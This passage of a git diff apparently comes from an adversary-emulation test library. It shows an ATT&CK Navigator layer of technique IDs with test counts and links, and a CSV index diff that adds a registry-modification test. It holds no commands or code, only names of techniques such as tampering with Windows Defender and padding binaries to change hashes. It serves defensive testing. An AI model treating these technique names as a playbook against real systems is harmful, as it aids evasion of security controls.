Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.005/T1218.005.md"}]},{"techniqueID":"T1218.007","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.007/T1218.007.md"}]},{"techniqueID":"T1218.008","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.008/T1218.008.md"}]},{"techniqueID":"T1218.009","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.009/T1218.009.md"}]},{"techniqueID":"T1218.010","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.010/T1218.010.md"}]},{"techniqueID":"T1218.011","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1218.011/T1218.011.md"}]},{"techniqueID":"T1219","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1219/T1219.md"}]},{"techniqueID":"T1220","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1220/T1220.md"}]},{"techniqueID":"T1221","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1221/T1221.md"}]},{"techniqueID":"T1222","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222/T1222.md"}]},{"techniqueID":"T1222.001","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.001/T1222.001.md"}]},{"techniqueID":"T1222.002","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1222.002/T1222.002.md"}]},{"techniqueID":"T1482","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1482/T1482.md"}]},{"techniqueID":"T1484","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.001/T1484.001.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1485","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md"}]},{"techniqueID":"T1486","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1486/T1486.md"}]},{"techniqueID":"T1489","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1489/T1489.md"}]},{"techniqueID":"T1490","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1490/T1490.md"}]},{"techniqueID":"T1491","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491/T1491.md"}]},{"techniqueID":"T1491.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1491.001/T1491.001.md"}]},{"techniqueID":"T1496","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1496/T1496.md"}]},{"techniqueID":"T1497","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497/T1497.md"}]},{"techniqueID":"T1497.001","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1497.001/T1497.001.md"}]},{"techniqueID":"T1505","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505/T1505.md"}]},{"techniqueID":"T1505.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.002/T1505.002.md"}]},{"techniqueID":"T1505.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.003/T1505.003.md"}]},{"techniqueID":"T1505.004","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.004/T1505.004.md"}]},{"techniqueID":"T1505.005","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1505.005/T1505.005.md"}]},{"techniqueID":"T1518","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518/T1518.md"}]},{"techniqueID":"T1518.001","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1518.001/T1518.001.md"}]},{"techniqueID":"T1526","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1526/T1526.md"}]},{"techniqueID":"T1528","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1528/T1528.md"}]},{"techniqueID":"T1529","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1529/T1529.md"}]},{"techniqueID":"T1530","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1530/T1530.md"}]},{"techniqueID":"T1531","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1539","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1539/T1539.md"}]},{"techniqueID":"T1543","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543/T1543.md"}]},{"techniqueID":"T1543.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.001/T1543.001.md"}]},{"techniqueID":"T1543.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.002/T1543.002.md"}]},{"techniqueID":"T1543.003","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.003/T1543.003.md"}]},{"techniqueID":"T1543.004","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1543.004/T1543.004.md"}]},{"techniqueID":"T1546","score":35,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546/T1546.md"}]},{"techniqueID":"T1546.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.001/T1546.001.md"}]},{"techniqueID":"T1546.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.002/T1546.002.md"}]},{"techniqueID":"T1546.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.003/T1546.003.md"}]},{"techniqueID":"T1546.004","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.004/T1546.004.md"}]},{"techniqueID":"T1546.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.005/T1546.005.md"}]},{"techniqueID":"T1546.007","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.007/T1546.007.md"}]},{"techniqueID":"T1546.008","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.008/T1546.008.md"}]},{"techniqueID":"T1546.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.009/T1546.009.md"}]},{"techniqueID":"T1546.010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.010/T1546.010.md"}]},{"techniqueID":"T1546.011","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.011/T1546.011.md"}]},{"techniqueID":"T1546.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.012/T1546.012.md"}]},{"techniqueID":"T1546.013","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.013/T1546.013.md"}]},{"techniqueID":"T1546.014","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.014/T1546.014.md"}]},{"techniqueID":"T1546.015","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1546.015/T1546.015.md"}]},{"techniqueID":"T1547","score":45,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547/T1547.md"}]},{"techniqueID":"T1547.001","score":17,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.001/T1547.001.md"}]},{"techniqueID":"T1547.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.002/T1547.002.md"}]},{"techniqueID":"T1547.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.003/T1547.003.md"}]},{"techniqueID":"T1547.004","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.004/T1547.004.md"}]},{"techniqueID":"T1547.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.005/T1547.005.md"}]},{"techniqueID":"T1547.006","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.006/T1547.006.md"}]},{"techniqueID":"T1547.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.007/T1547.007.md"}]},{"techniqueID":"T1547.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.008/T1547.008.md"}]},{"techniqueID":"T1547.009","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.009/T1547.009.md"}]},{"techniqueID":"T1547.010","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.010/T1547.010.md"}]},{"techniqueID":"T1547.012","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.012/T1547.012.md"}]},{"techniqueID":"T1547.014","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.014/T1547.014.md"}]},{"techniqueID":"T1547.015","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1547.015/T1547.015.md"}]},{"techniqueID":"T1548","score":33,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548/T1548.md"}]},{"techniqueID":"T1548.001","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.001/T1548.001.md"}]},{"techniqueID":"T1548.002","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.002/T1548.002.md"}]},{"techniqueID":"T1548.003","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1548.003/T1548.003.md"}]},{"techniqueID":"T1550","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550/T1550.md"}]},{"techniqueID":"T1550.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.002/T1550.002.md"}]},{"techniqueID":"T1550.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1550.003/T1550.003.md"}]},{"techniqueID":"T1552","score":34,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.001","score":12,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.001/T1552.001.md"}]},{"techniqueID":"T1552.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.002/T1552.002.md"}]},{"techniqueID":"T1552.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.003/T1552.003.md"}]},{"techniqueID":"T1552.004","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.004/T1552.004.md"}]},{"techniqueID":"T1552.005","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1552.006","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.006/T1552.006.md"}]},{"techniqueID":"T1552.007","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1553","score":11,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553/T1553.md"}]},{"techniqueID":"T1553.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.001/T1553.001.md"}]},{"techniqueID":"T1553.004","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.004/T1553.004.md"}]},{"techniqueID":"T1553.005","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1553.005/T1553.005.md"}]},{"techniqueID":"T1555","score":27,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555/T1555.md"}]},{"techniqueID":"T1555.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.001/T1555.001.md"}]},{"techniqueID":"T1555.003","score":16,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.003/T1555.003.md"}]},{"techniqueID":"T1555.004","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1555.004/T1555.004.md"}]},{"techniqueID":"T1556","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556/T1556.md"}]},{"techniqueID":"T1556.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.002/T1556.002.md"}]},{"techniqueID":"T1556.003","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1556.003/T1556.003.md"}]},{"techniqueID":"T1557","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557/T1557.md"}]},{"techniqueID":"T1557.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1557.001/T1557.001.md"}]},{"techniqueID":"T1558","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558/T1558.md"}]},{"techniqueID":"T1558.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.001/T1558.001.md"}]},{"techniqueID":"T1558.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.002/T1558.002.md"}]},{"techniqueID":"T1558.003","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.003/T1558.003.md"}]},{"techniqueID":"T1558.004","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1558.004/T1558.004.md"}]},{"techniqueID":"T1559","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559/T1559.md"}]},{"techniqueID":"T1559.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1559.002/T1559.002.md"}]},{"techniqueID":"T1560","score":14,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560/T1560.md"}]},{"techniqueID":"T1560.001","score":9,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.001/T1560.001.md"}]},{"techniqueID":"T1560.002","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1560.002/T1560.002.md"}]},{"techniqueID":"T1562","score":99,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562/T1562.md"}]},{"techniqueID":"T1562.001","score":44,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.001/T1562.001.md"}]},{"techniqueID":"T1562.002","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"}]},{"techniqueID":"T1562.003","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":20,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":10,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1562.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.009/T1562.009.md"}]},{"techniqueID":"T1563","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563/T1563.md"}]},{"techniqueID":"T1563.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1563.002/T1563.002.md"}]},{"techniqueID":"T1564","score":23,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.001","score":8,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1564.002","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.002/T1564.002.md"}]},{"techniqueID":"T1564.003","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.003/T1564.003.md"}]},{"techniqueID":"T1564.004","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.004/T1564.004.md"}]},{"techniqueID":"T1564.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.006/T1564.006.md"}]},{"techniqueID":"T1566","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566/T1566.md"}]},{"techniqueID":"T1566.001","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1566.001/T1566.001.md"}]},{"techniqueID":"T1567","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567/T1567.md"}]},{"techniqueID":"T1567.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1567.002/T1567.002.md"}]},{"techniqueID":"T1569","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.001/T1569.001.md"}]},{"techniqueID":"T1569.002","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1570","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1570/T1570.md"}]},{"techniqueID":"T1571","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1572","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1572/T1572.md"}]},{"techniqueID":"T1573","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1573/T1573.md"}]},{"techniqueID":"T1574","score":13,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.001/T1574.001.md"}]},{"techniqueID":"T1574.002","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.002/T1574.002.md"}]},{"techniqueID":"T1574.006","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1574.008","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.008/T1574.008.md"}]},{"techniqueID":"T1574.009","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.009/T1574.009.md"}]},{"techniqueID":"T1574.011","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.011/T1574.011.md"}]},{"techniqueID":"T1574.012","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.012/T1574.012.md"}]},{"techniqueID":"T1580","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1592","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592/T1592.md"}]},{"techniqueID":"T1592.001","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1592.001/T1592.001.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]},{"techniqueID":"T1614","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":6,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]},{"techniqueID":"T1615","score":5,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1615/T1615.md"}]},{"techniqueID":"T1619","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1619/T1619.md"}]},{"techniqueID":"T1620","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1620/T1620.md"}]},{"techniqueID":"T1647","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1647/T1647.md"}]},{"techniqueID":"T1649","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1649/T1649.md"}]}]}
\ No newline at end of file
diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv
index 264f46b3..d1071607 100644
--- a/atomics/Indexes/Indexes-CSV/index.csv
+++ b/atomics/Indexes/Indexes-CSV/index.csv
@@ -260,6 +260,7 @@ defense-evasion,T1112,Modify Registry,53,Windows Auto Update Option to Notify be
defense-evasion,T1112,Modify Registry,54,Do Not Connect To Win Update,d1de3767-99c2-4c6c-8c5a-4ba4586474c8,command_prompt
defense-evasion,T1112,Modify Registry,55,Tamper Win Defender Protection,3b625eaa-c10d-4635-af96-3eae7d2a2f3c,command_prompt
defense-evasion,T1112,Modify Registry,56,Snake Malware Registry Blob,8318ad20-0488-4a64-98f4-72525a012f6b,powershell
+defense-evasion,T1112,Modify Registry,57,Allow Simultaneous Download Registry,37950714-e923-4f92-8c7c-51e4b6fffbf6,command_prompt
defense-evasion,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh
